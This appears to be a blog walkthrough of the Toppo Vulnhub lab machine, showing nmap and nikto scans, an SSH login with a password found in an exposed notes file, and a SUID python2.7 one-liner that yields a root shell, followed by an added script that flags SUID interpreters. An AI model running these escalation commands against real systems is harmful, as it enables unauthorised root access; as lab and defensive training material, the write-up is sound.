Toppo Vulnhub Walkthrough

Tanishq🇮🇳
3 min read · Aug 29, 2021

Methodology

  1. Scanning for ports
  2. Nikto scan
  3. Accessing the machine via SSH
  4. SUID privilege escalation

First, to find the IP, I used netdiscover:

# netdiscover -i eth0

Then I ran the nmap scan, from which I found the 3 open ports:

# nmap -v -p 22,80,111,60752 -sT -sV -sC -A -O -oN nmap/toppo_initial 192.168.1.5

From the nmap scan we can say that OpenSSH and Apache are both not vulnerable, so I visited port 80, which is a simple blog template from Bootstrap:

http://192.168.1.5/

Then, for more information about the web server, I ran a nikto scan:

# nikto -h 192.168.1.5 -port 80

From the nikto scan I found out that there is a directory named admin on the web server with directory indexing:

http://192.168.1.5/admin

From admin we found that there is a note file which can be helpful for us:

http://192.168.1.5/admin/notes.txt

We found a personal note revealing the admin's password. For the username I tried ted, as it's a part of the password:

# ssh ted@192.168.1.5

I created an SSH session with the credentials we found.

Now, for privilege escalation, I tried finding files with SUID permission on the machine:

$ find / -perm -u=s -type f 2>/dev/null

From the given output we found that the python2.7 binary has SUID permissions, which can be useful for us:

$ python -c "import os; os.execl('/bin/bash','bash','-p')"

With the above command we were able to get a root shell.
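A defender-side counterpart to the find command above, as an added example that is not part of the original walkthrough: it filters a SUID listing for interpreters and shells, which should not carry the SUID bit, and prints the chmod command that removes it. The function names, the name patterns and the sample listing are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the walkthrough): flag SUID interpreters and shells.
# The name patterns are an illustrative, non-exhaustive assumption.

# Constructed sample of `find / -perm -u=s -type f 2>/dev/null` output.
SAMPLE='/bin/su
/bin/mount
/usr/bin/passwd
/usr/bin/python2.7
/usr/bin/chsh'

# Read one path per line on stdin; print "<kind> <path>" for risky entries.
flag_risky_suid() {
    while IFS= read -r path; do
        name=${path##*/}    # basename of the file
        case "$name" in
            python|python[0-9]*|perl|perl[0-9]*|ruby|ruby[0-9]*|php|php[0-9]*|lua|lua[0-9]*|node)
                printf 'interpreter %s\n' "$path" ;;
            awk|mawk|gawk|nawk)
                printf 'interpreter %s\n' "$path" ;;
            sh|bash|dash|zsh|ksh)
                printf 'shell %s\n' "$path" ;;
        esac
    done
}

# Print (do not run) the command that strips the SUID bit from each hit.
suggest_fix() {
    flag_risky_suid | while read -r _kind path; do
        printf "chmod u-s -- '%s'\n" "$path"
    done
}

# Demo on the constructed sample; on a real host, pipe the find output in.
printf '%s\n' "$SAMPLE" | flag_risky_suid
printf '%s\n' "$SAMPLE" | suggest_fix
```

On a live system the same functions take the output of the find command shown earlier on stdin, for example as a scheduled audit run by root.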

FLAG

# cat /root/flag.txt
